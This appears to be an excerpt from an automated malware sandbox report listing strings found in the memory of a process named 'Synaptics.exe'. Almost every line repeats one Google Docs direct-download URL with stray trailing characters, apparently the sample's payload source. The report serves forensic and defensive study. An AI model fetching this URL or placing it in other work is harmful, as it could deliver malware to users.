                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEG
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEj
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFk
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG80N)
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH8
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI3
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIC
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJL
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKk-O
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLB
                              Source: Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLkbL.
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM9
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMF
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMf
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNG
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPG
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPj
                              Source: Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPkvL-
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRe
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSC
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT_
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU(
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUA
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUg
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVB
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVWW
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVl
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWF
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWi
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXF
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY.5O
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY2
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYM
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYa
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_150xA
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_98O
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_h
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada2
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaa
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadt
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadan
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbA
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbl
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc%
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc%f
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc9
